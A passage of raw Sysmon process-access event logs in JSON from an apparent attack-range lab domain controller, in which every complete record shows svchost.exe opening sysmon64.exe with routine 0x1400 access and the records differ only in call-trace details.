07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 